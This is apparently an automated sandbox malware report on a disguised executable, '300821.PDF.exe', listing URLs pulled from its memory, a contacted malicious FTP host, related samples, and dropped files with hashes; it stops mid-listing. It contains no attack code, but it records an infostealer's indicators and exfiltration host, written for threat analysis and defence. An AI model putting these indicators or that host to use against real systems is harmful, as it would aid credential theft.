                              https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637bhvE2B1.tmp.8.drfalse
                                		high
                                http://www.msn.combhvE2B1.tmp.8.drfalse
                                  		high
                                  http://www.fontbureau.com/designers300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                    		high
                                    https://deff.nelreports.net/api/report?cat=msnbhvE2B1.tmp.8.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contextual.media.net/__media__/js/util/nrrV9140.jsbhvE2B1.tmp.8.drfalse
                                      		high
                                      https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.jsbhvE2B1.tmp.8.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.pngbhvE2B1.tmp.8.drfalse
                                        		high
                                        http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2ZbhvE2B1.tmp.8.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1bhvE2B1.tmp.8.drfalse
                                          		high
                                          https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsbhvE2B1.tmp.8.drfalse
                                            		high
                                            http://whatismyipaddress.com/-300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/DPlease300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.site.com/logs.php300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.zhongyicts.com.cn300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.cssbhvE2B1.tmp.8.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&psbhvE2B1.tmp.8.drfalse
                                                    		high
                                                    https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937bhvE2B1.tmp.8.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5bhvE2B1.tmp.8.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pqbhvE2B1.tmp.8.drfalse
                                                      		high
                                                      https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kbhvE2B1.tmp.8.drfalse
                                                        		high
                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeebhvE2B1.tmp.8.drfalse
                                                          		high
                                                          https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266ebhvE2B1.tmp.8.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cbhvE2B1.tmp.8.drfalse
                                                            		high
                                                            https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9bhvE2B1.tmp.8.drfalse
                                                              		high
                                                              https://www.google.com/chrome/static/images/download-browser/pixel_phone.pngbhvE2B1.tmp.8.drfalse
                                                                		high
                                                                https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.pngbhvE2B1.tmp.8.drfalse
                                                                  		high
                                                                  https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookiebhvE2B1.tmp.8.drfalse
                                                                    		high
                                                                    https://pki.goog/repository/0bhvE2B1.tmp.8.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.msn.com/vbc.exe, 00000008.00000003.691619174.00000000021F5000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drfalse
                                                                      		high
                                                                      https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1bhvE2B1.tmp.8.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUebhvE2B1.tmp.8.drfalse
                                                                        		high
                                                                        https://www.google.com/favicon.icobhvE2B1.tmp.8.drfalse
                                                                          		high
                                                                          http://www.carterandcone.coml300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.msn.com/bhvE2B1.tmp.8.drfalse
                                                                            		high
                                                                            https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhvE2B1.tmp.8.drfalse
                                                                              		high
                                                                              https://172.217.23.78/vbc.exe, 00000008.00000003.691925057.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.google.com/images/nav_logo299.pngbhvE2B1.tmp.8.drfalse
                                                                                		high
                                                                                https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhvE2B1.tmp.8.drfalse
                                                                                  		high
                                                                                  https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&bhvE2B1.tmp.8.drfalse
                                                                                    		high
                                                                                    https://aefd.nelreports.net/api/report?cat=bingrmsbhvE2B1.tmp.8.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.google.com/accounts/serviceloginvbc.exefalse
                                                                                      		high
                                                                                      https://consent.google.com/set?pc=s&uxe=4421591bhvE2B1.tmp.8.drfalse
                                                                                        		high
                                                                                        http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3ZbhvE2B1.tmp.8.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.google.com/images/hpp/Chrome_Owned_96x96.pngbhvE2B1.tmp.8.drfalse
                                                                                          		high
                                                                                          http://crl.pki.goog/gsr2/gsr2.crl0?bhvE2B1.tmp.8.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://pki.goog/gsr2/GTSGIAG3.crt0)bhvE2B1.tmp.8.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrFbhvE2B1.tmp.8.drfalse
                                                                                            		high
                                                                                            https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2bhvE2B1.tmp.8.drfalse
                                                                                              		high
                                                                                              https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhvE2B1.tmp.8.drfalse
                                                                                                		high
                                                                                                https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframesbhvE2B1.tmp.8.drfalse
                                                                                                  		high
                                                                                                  https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_bhvE2B1.tmp.8.drfalse
                                                                                                    		high
                                                                                                    http://www.founder.com.cn/cn/bThe300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=httpsvbc.exe, 00000008.00000003.690799803.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drfalse
                                                                                                      		high
                                                                                                      https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authusbhvE2B1.tmp.8.drfalse
                                                                                                        		high
                                                                                                        https://www.google.com/images/phd/px.gifbhvE2B1.tmp.8.drfalse
                                                                                                          		high
                                                                                                          https://www.google.com/chrome/static/images/homepage/google-canary.pngbhvE2B1.tmp.8.drfalse
                                                                                                            		high
                                                                                                            https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJGbhvE2B1.tmp.8.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.pngbhvE2B1.tmp.8.drfalse
                                                                                                              		high
                                                                                                              https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhvE2B1.tmp.8.drfalse
                                                                                                                		high
                                                                                                                https://www.google.com/chrome/static/js/main.v2.min.jsbhvE2B1.tmp.8.drfalse
                                                                                                                  		high
                                                                                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfbhvE2B1.tmp.8.drfalse
                                                                                                                    		high
                                                                                                                    https://cvision.media.net/new/100x75/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9bhvE2B1.tmp.8.drfalse
                                                                                                                      		high
                                                                                                                      http://www.typography.netD300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://fontfabrik.com300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBmbhvE2B1.tmp.8.drfalse
                                                                                                                        		high
                                                                                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvE2B1.tmp.8.drfalse
                                                                                                                          		high
                                                                                                                          https://www.google.com/intl/en_uk/chrome/bhvE2B1.tmp.8.drfalse
                                                                                                                            		high
                                                                                                                            https://www.google.com/chrome/static/images/fallback/icon-youtube.jpgbhvE2B1.tmp.8.drfalse
                                                                                                                              		high
                                                                                                                              https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQNbhvE2B1.tmp.8.drfalse
                                                                                                                                		high
                                                                                                                                https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:bhvE2B1.tmp.8.drfalse
                                                                                                                                  		high
                                                                                                                                  http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkMbhvE2B1.tmp.8.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.fonts.com300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.sandoll.co.kr300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094bhvE2B1.tmp.8.drfalse
                                                                                                                                      		high
                                                                                                                                      https://www.google.com/chrome/static/js/installer.min.jsbhvE2B1.tmp.8.drfalse
                                                                                                                                        		high
                                                                                                                                        https://www.google.com/searchbhvE2B1.tmp.8.drfalse
                                                                                                                                          		high
                                                                                                                                          https://www.google.com/chrome/static/images/download-browser/pixel_tablet.pngbhvE2B1.tmp.8.drfalse
                                                                                                                                            		high
                                                                                                                                            https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJbhvE2B1.tmp.8.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://www.google.com/images/icons/material/system/1x/email_grey600_24dp.pngbhvE2B1.tmp.8.drfalse
                                                                                                                                              		high
                                                                                                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvE2B1.tmp.8.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://www.google.com/chrome/static/images/homepage/google-beta.pngbhvE2B1.tmp.8.drfalse
                                                                                                                                                		high
                                                                                                                                                http://www.msn.com/de-ch/?ocid=iehpbhvE2B1.tmp.8.drfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlN300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.founder.com.cn/cn300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1bhvE2B1.tmp.8.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.jsbhvE2B1.tmp.8.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47bhvE2B1.tmp.8.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svgbhvE2B1.tmp.8.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://microsvbc.exe, 00000008.00000003.692044684.00000000027C8000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://support.google.com/accounts/answer/151657bhvE2B1.tmp.8.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370ebhvE2B1.tmp.8.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore.jsbhvE2B1.tmp.8.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatebhvE2B1.tmp.8.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.pngbhvE2B1.tmp.8.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpgbhvE2B1.tmp.8.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.google.com/chrome/static/images/chrome-logo.svgbhvE2B1.tmp.8.drfalse
                                                                                                                                                                    		high

                                                                                                                                                                    Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    66.70.204.222
                                                                                                                                                                    		ftp.vn-gpack.orgCanada
                                                                                                                                                                    		16276OVHFRtrue

                                                                                                                                                                    Private

                                                                                                                                                                    IP
                                                                                                                                                                    192.168.2.1

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                    Analysis ID:473673
                                                                                                                                                                    Start date:30.08.2021
                                                                                                                                                                    Start time:06:54:09
                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 9m 54s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:light
                                                                                                                                                                    Sample file name:300821.PDF.exe
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                    Number of analysed new started processes analysed:20
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • HDC enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.phis.troj.spyw.evad.winEXE@7/5@2/2
                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                    HDC Information:
                                                                                                                                                                    • Successful, ratio: 98.9% (good quality ratio 95.9%)
                                                                                                                                                                    • Quality average: 85.6%
                                                                                                                                                                    • Quality standard deviation: 23.2%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                    Warnings:
                                                                                                                                                                    Show All
                                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.80.193, 51.104.136.2, 204.79.197.222, 20.82.210.154, 20.75.105.140, 40.112.88.60, 80.67.82.235, 80.67.82.211
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fp.msedge.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, a-0019.a-msedge.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, go.microsoft.com, a-0019.standard.a-msedge.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    06:55:04API Interceptor6x Sleep call for process: 300821.PDF.exe modified

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    66.70.204.222Dolmas.xlsm.exeGet hashmaliciousBrowse
                                                                                                                                                                    • tesla-com.tk/Awele/SINOPHIL@LOKIRAW_HGiTKz109.bin
                                                                                                                                                                    eurobank.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                    • tesla-com.tk/ford/SINOPHIL@LOKIRAW_GCLYOSF135.bin

                                                                                                                                                                    Domains

                                                                                                                                                                    No context

                                                                                                                                                                    ASN

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    OVHFRsx5Yixa5GO.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    fzUNUBx4wC.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    DpO9nEw19q.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    d6Q0sXQjkY.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    VoFsQd7jwx.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    waKnA3vFb3Get hashmaliciousBrowse
                                                                                                                                                                    • 79.137.66.196
                                                                                                                                                                    xQDLIutCAU.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    io9rjV248Z.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    LeSA7F7a96.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    loligang.armGet hashmaliciousBrowse
                                                                                                                                                                    • 92.246.246.95
                                                                                                                                                                    sG41vsm1Pe.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    0tLYXVrJOe.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    RyGaFxV75v.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    uvVLne3r48.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    gMWaIDKK37.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    hsRrR2KPY7.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    pCSou0ozZy.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    ZUd8KSXXVD.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    FWXckJ56fn.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151
                                                                                                                                                                    k2vbB70cV7.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 158.69.65.151

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    No context

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\300821.PDF.exe.log
                                                                                                                                                                    Process:C:\Users\user\Desktop\300821.PDF.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                    Entropy (8bit):5.355304211458859
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhvE2B1.tmp
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6c81e4e3, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):29884416
                                                                                                                                                                    Entropy (8bit):1.0563745804808284
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:GjbVPt8HVmyvYw781dfXy7R4aUpPX7Cr6f63rsLOZgv:8NyvArO0v
                                                                                                                                                                    MD5:AB607EDB401FC1704B6A7FA5E5208D71
                                                                                                                                                                    SHA1:747438185721FADCD454E338D8F5B45E47D56336
                                                                                                                                                                    SHA-256:D4786F79983EDE99BE61190781F57AF3A290175F890D3CB09CB2F963A20BACFF
                                                                                                                                                                    SHA-512:7B7490EDD7BFD6E3B86BCCFB463EF67D072DABBE894678337A5F047316A0FBD542CC215B30A61915F383F102CF5E8AE69A992A7296D2EDE536A78CD7C29CF910
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: l...... ........?......_e..*....w......................^.8.....;#...xE.-6...yQ.h.:.........................b...*....w..............................................................................................{............B.................................................................................................................. .......36...y........................................................................................................................................................................................................................................AI.7...y......................7...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                    Preview: ..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\pid.txt
                                                                                                                                                                    Process:C:\Users\user\Desktop\300821.PDF.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                    Entropy (8bit):1.5
                                                                                                                                                                    Encrypted:false
